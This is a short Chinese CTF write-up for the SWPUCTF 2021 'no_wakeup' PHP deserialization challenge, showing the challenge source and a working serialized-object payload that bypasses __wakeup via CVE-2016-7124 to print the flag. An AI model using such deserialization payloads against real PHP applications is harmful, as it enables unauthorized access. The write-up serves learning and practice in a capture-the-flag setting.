(反序列化)[SWPUCTF 2021 新生赛]no_wakeup

打开题目

复制代码
<?php

header("Content-type:text/html;charset=utf-8");
error_reporting(0);
show_source("class.php");

class HaHaHa{


        public $admin;
        public $passwd;

        public function __construct(){
            $this->admin ="user";
            $this->passwd = "123456";
        }

        public function __wakeup(){
            $this->passwd = sha1($this->passwd);
        }

        public function __destruct(){
            if($this->admin === "admin" && $this->passwd === "wllm"){
                include("flag.php");
                echo $flag;
            }else{
                echo $this->passwd;
                echo "No wake up";
            }
        }
    }

$Letmeseesee = $_GET['p'];
unserialize($Letmeseesee);

?> 

__destruct->__wakeup(要绕过)

反序列时先检测有没有wakeup方法,有就先调用

但是CVE-2016-7124影响版本:PHP5 < 5.6.25;PHP7 < 7.0.10

p=O:6:"HaHaHa":3:{s:5:"admin";s:5:"admin";s:6:"passwd";s:4:"wllm";}

即可

相关推荐
AI-小柒17 分钟前
从零入门大语言模型(LLM):系统学习路线与实践指南
大数据·开发语言·人工智能·学习·信息可视化·语言模型·自然语言处理
咋吃都不胖lyh27 分钟前
GBDT 中的前向分布算法和贪婪学习
学习·算法
LUCIFER31 分钟前
学习随笔:摄像头采集数据后进行视频编解码的常见概念与疑问
学习·音视频
LXY_BUAA1 小时前
《C++学习》Qt软件安装_20260123
学习
真正的醒悟2 小时前
什么是标准等保架构
开发语言·php
郑州光合科技余经理2 小时前
同城020系统架构实战:中台化设计与部署
java·大数据·开发语言·后端·系统架构·uni-app·php
觉醒大王2 小时前
医学好投的普刊分享
前端·论文阅读·深度学习·学习·自然语言处理·学习方法
鄭郑2 小时前
【Playwright 学习笔记 05】Xpath选择
笔记·学习
wdfk_prog2 小时前
[Linux]学习笔记系列 -- [drivers][base]syscore
linux·笔记·学习
COHESION_20102 小时前
Tulsimer树脂在锂电高盐锂液深度除杂中的技术实践与应用
经验分享·其他